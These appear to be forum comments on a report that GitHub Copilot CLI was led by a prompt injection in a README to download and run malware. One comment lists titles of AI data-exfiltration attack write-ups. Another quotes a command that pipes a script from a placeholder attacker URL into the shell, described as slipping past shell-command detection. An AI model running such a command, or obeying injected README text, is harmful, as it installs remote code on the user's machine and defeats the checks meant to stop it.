GitHub Copilot CLI downloads and executes malware

This isn't a novel technical vulnerability write up.

The author had copilot read a "prompt injection" inside a readme while copilot is enabled to execute code or run bash commands (which user had to explicitly agree to).

I highly suspect this account is astro-turfing for the site too... look at their sidebar:

``` Claude Cowork Exfiltrates Files

HN #1

Superhuman AI Exfiltrates Emails

HN #12

IBM AI ('Bob') Downloads and Executes Malware

HN #1

Notion AI: Data Exfiltration

HN #4

HuggingFace Chat Exfiltrates Data

Screen takeover attack in vLex (legal AI acquired for $1B)

Google Antigravity Exfiltrates Data

HN #1

CellShock: Claude AI is Excel-lent at Stealing Data

Hijacking Claude Code via Injected Marketplace Plugins

Data Exfiltration from Slack AI via Indirect Prompt Injection

HN #1

Data Exfiltration from Writer.com via Indirect Prompt Injection

HN #5 ```

  Here is a malicious command that bypasses the shell command detection mechanisms: 
    $ env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh

does everyone really need their own coding agent CLI? i feel like companies are skipping security to push out these tools